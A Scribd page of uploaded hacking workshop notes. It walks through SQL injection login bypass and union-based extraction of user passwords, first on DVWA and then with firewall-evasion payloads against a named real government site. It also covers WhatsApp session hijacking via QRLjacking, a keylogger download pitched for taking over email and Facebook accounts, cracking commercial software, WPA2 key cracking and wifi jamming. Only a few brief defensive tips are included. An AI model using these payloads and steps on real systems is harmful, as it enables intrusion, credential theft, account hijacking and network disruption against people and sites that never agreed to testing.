Scribd Logo
Upload

Welcome to Scribd!

  • Chota Bheem

    Uploaded by

    Rishab Agrawal
    11 views6 pages
    Pic

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Pic

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    11 views6 pages

    Chota Bheem

    Uploaded by

    Rishab Agrawal
    Pic

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 6

    Day 2

    -----
    Web Application Hacking and Security
    ------------------------------------
    Website: Collecetion of pages is known as website.

    Types of Websites

    Static : A Website will have no database inside it hence user can see the content
    of the website but can not input anything from users's side.

    For Example: Pure HTML Site.

    Dynamic : These websites carry database with in hence it has lots of user
    interaction area's from where user eneters information/data which goes and save in
    the backend.

    For Example: facebook,google,twitter,ums etc

    OWASP TOP 10 Attacks


    O : Open
    W : web
    A : Application
    S : Security
    P : Project

    www.owasp.org

    SQL Injection
    -------------
    SQL : Structured Query Language

    DDL : Data Definition Lanaguage

    DML : Data Manupulation Lang.

    DCL : Data Control Lang.

    Attack 1: Authentication Bypass Attack


    --------------------------------------
    When a hacker tries to bypass the login panel of the website and gain access of the
    admin panel with all features through which he/she can manupulate the website
    content.

    Target : safesecurities.com.pk

    userid=osama admin
    password=bomb admin

    select * from userstable where userid='osama''or'1'='1 and password='bomb''or'1'='1

    'or'1'='1

    Union Based Injection


    ---------------------
    DVWA

    D : Damn
    V : Vulnerable
    W : Web
    A : Application

    Download : www.dvwa.org

    Requirements
    ------------
    1. XAMPP Server (To make your computer as server)
    X : Cross Platform
    A : Apache
    M : MY-SQL
    P : PHP
    P : Perl

    Download: apachefriends.org
    2. DVWA :Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
    vulnerable. Its main goals are to be an aid for security professionals to test
    their skills and tools in a legal environment, help web developers better
    understand the processes of securing web applications and aid teachers/students to
    teach/learn web application security in a class room environment.

    3. Copy and paste downloaded files in c:/xampp/htdoc folder

    127.0.0.1/dvwa

    username=admin
    password:password

    Step 1: Target
    http://192.168.235.174/dvwa/vulnerabilities/sqli/

    Step 2: Find any GET method in the URL of the website

    GET : www.gmail.com/php?id=10
    POST : www.gmail.com/id/
    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

    Step 3: Check the exception handling


    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#

    Step 4: Total number of columns from the respective table where id is a column.
    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--
    +&Submit=Submit#

    Step 5: Dump the left 2 columns on the right hand side.


    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--
    +&Submit=Submit#
    Step 6: Get the database and version name
    Database->Tables->Columns->Data
    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select
    database(),version()--+&Submit=Submit#

    Step 7: Get the entire tables of the webiste from the database.
    Schema: Database ki MAA.
    Tables :information_schema.tables

    Columns:information_schema.columns

    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name


    from information_schema.tables--+&Submit=Submit#

    Target Table Found : users

    Step 8 : Get the columns of the users table


    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name
    from information_schema.columns where table_name='users'--+&Submit=Submit#

    Step 9 : Get the data from user and password columns


    http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password
    from users--+&Submit=Submit#

    Bypassing Firewall aka Union Based Injection via Web Application Firewall
    techniques
    --------------------------------------------
    Target: multan.gov.pk

    Step 1: FInd GET method in the URL


    http://target.com/files.php?id=1

    Step 2: Check the exception hanlding


    http://target.com/files.php?id=1'

    Step 3: Count the total number of columns


    http://target.com/files.php?id=1 order by 3--+

    Step 4: Dump the columns on the right handside.


    http://target.com/files.php?id=1 union select 1,2--+

    Bypassing Technique 1:
    Upper Lower Case
    union select
    UnIoN sElEcT -> new payload

    http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+

    Bypassing Technique II:Inline Comments


    --------------------------------------
    Executable inline comments

    /*!UnIoN*/ /*!SeLeCt*/

    http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+


    Bypassing technique 3: Version Based Inline Executable Comments
    http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+

    My-SQL
    1.00.00 : 10000
    2.00.00 :20000
    3.00.00
    4.00.00
    5.00.00 : 50000

    STep 5: Get the database


    http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+

    Step 6: Get the tables of the database


    http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/
    /*!from*/ /*!information_schema.tables*/--+

    Target Table : users

    Step 7: Get the columns


    http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!
    50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!
    50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+

    Step 8: Get the login and password


    http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from
    users--+

    Secure
    -------
    1. Do not run waf with default security settings
    2. Keep update on new blacklisted parameters for waf
    3. Make sure you do the custom changes in the WAF as per attack you are getting
    4. Never off the firewall interms of fast response expectation in traffic.
    5. have good validation of received queries and inputs at server level also.

    Whatsapp Hacking Attack : QRLJACKING


    ------------------------------------
    Step 1: Download Kali Linux (2.99GB)
    kali.org
    How to Install and RUn : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU

    Step 2: Run and fill the username and password


    username: root
    password: toor

    Step 3: Download QRLjacking code from Github


    Open Terminal: git clone https://github.com/OWASP/QRLJacking.git

    Step 4: Open QRLframework folder


    Step 5: give permissions to qrljacker.py
    chmod +x qrljacker.py
    Step 6: Run it in terminal ./QrlJacker.py
    Step 7: Select Chat Application -> Whatsapp -> Select Port 1337

    Step 4: To make this fake whatsapp QR code LIVE on internet.


    Download a service AKA: ngrok
    https://ngrok.com/download
    Facebook | Email Hacking Methods
    --------------------------------
    Family Keylogger : http://www.spyarsenal.com/download.html

    How to Secure your Email Accounts


    ---------------------------------
    1. Always use a pass phrase instead of a password.
    2. Always use a robust password
    howsecureismypassword.net

    checkurcardhackedornot.com
    Card no Expiry Date and CVV : Check

    oncetherewasacrow

    3. *&Ig3SimG&*
    4. Active 2 Step Verification in your Gmail.
    5. Facebook: Backupcodes
    6. Always check ur login activites from Gmail to see any unauthorised access.

    Reverse Engineering | Cracking LIVE


    -----------------------------------
    Reverse Engineering

    Engineering : The goal of eng. is to build something.

    High Level : ENG : C C++ Java Python

    Middle Level : Assembly : .obj

    Low Level : Binary : .exe

    Requirements
    --------------
    1. OllyDBG
    2. Perfect Keylogger
    3. Windows Platform

    Target : http://www.blazingtools.com/downloads.html

    Wifi Hacking
    -------------
    Wifi Hacking: Wifi Stands for wireless fidelity. It works on protocol 802.11a
    onwards. Goal is to provide a wireless connectivty between hosts for data and
    information transfer and establish a valid communication channel for the same.

    Types of KEY Security Encryptions


    ---------------------------------
    1. WEP : 64bit
    2. WPA : 128bit
    3. WPA-2 PSK <--- Target 256 and above

    Problem : You cannot brute force the kEY.

    How to Crack then : Dictionary Based Attack

    Requirement
    -----------
    1. Kali Linux 1.8 version (old)
    2. airmon-ng : This application is a CLI based used to put your wifi device inot
    monitoring mode and check if its capable of proceeding with the attack.
    3. airodump-ng : This application will help you to dump the air packets and
    identofy that how many wifi access points are there near by you so that you can
    select the target to test its security.
    4.macchanger*: This helps you to spoof your wifi adpaters real identity with fake
    mac address in case you want to do anonymous security testing.
    5. aircrack-ng : This application will help you to crack the key which you
    extracted while wifi hacking process and will help you to match with the dictionary
    and if found will show the key.

    rahul -->!@#$% --> Mobile

    Router:rahul->!@#$% <---- !@#$%---rahul

    Network Attacks : Exploitation


    ------------------------------
    Active Attack : This attack is mainly concerned with the device direct
    attack.Hence we get the IP of teh device and then attack on the IP directly, the
    main goal of this attack is either to gain access to that device or if failed then
    down the host.

    Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit
    wifi jammer

    *Requirement : websploit in Kali Linux


    Step 1: Open terminal and type websploit

    Step 2: To see the cli network attacks type show modules

    Source Tute:https://www.youtube.com/watch?v=I4OPAdE5yv8

    Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-


    wifi-jammer/

    You might also like